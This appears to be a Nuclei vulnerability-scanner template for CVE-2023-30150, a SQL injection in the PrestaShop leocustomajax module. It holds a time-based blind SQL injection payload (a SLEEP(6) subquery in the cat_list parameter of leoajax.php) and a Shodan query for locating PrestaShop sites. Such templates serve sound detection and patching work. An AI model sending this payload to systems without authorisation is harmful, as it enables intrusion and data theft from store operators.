50 lines
1.9 KiB
YAML
50 lines
1.9 KiB
YAML
id: CVE-2023-30150
|
|
|
|
info:
|
|
name: PrestaShop leocustomajax 1.0 & 1.0.0 - SQL Injection
|
|
author: mastercho
|
|
severity: critical
|
|
description: |
|
|
PrestaShop leocustomajax 1.0 and 1.0.0 are vulnerable to SQL Injection via modules/leocustomajax/leoajax.php.
|
|
impact: |
|
|
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the PrestaShop application and its underlying database.
|
|
remediation: |
|
|
Apply the latest security patch or upgrade to a patched version of PrestaShop leocustomajax plugin to mitigate the SQL Injection vulnerability.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-30150
|
|
- https://security.friendsofpresta.org/module/2023/06/06/leocustomajax.html
|
|
- https://www.tenable.com/cve/CVE-2023-30150
|
|
- https://friends-of-presta.github.io/security-advisories/module/2023/06/06/leocustomajax.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-30150
|
|
cwe-id: CWE-89
|
|
epss-score: 0.02634
|
|
epss-percentile: 0.89208
|
|
cpe: cpe:2.3:a:leotheme:leocustomajax:1.0.0:*:*:*:*:prestashop:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: leotheme
|
|
product: leocustomajax
|
|
framework: prestashop
|
|
shodan-query: http.component:"Prestashop"
|
|
tags: cve,cve2023,prestashop,sqli,leotheme
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
GET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration_2>=6'
|
|
- 'contains(tolower(response_1), "prestashop")'
|
|
condition: and
|
|
# digest: 490a0046304402203d58359bda4a391139b99cec48099838945e2eabcc90570444a3cd424389ee5702200a597e329796e07d74e75b3c55f2eaf0f9887c709bccc3a448a1f6b67fb2780d:922c64590222798bb761d5b6d8e72950 |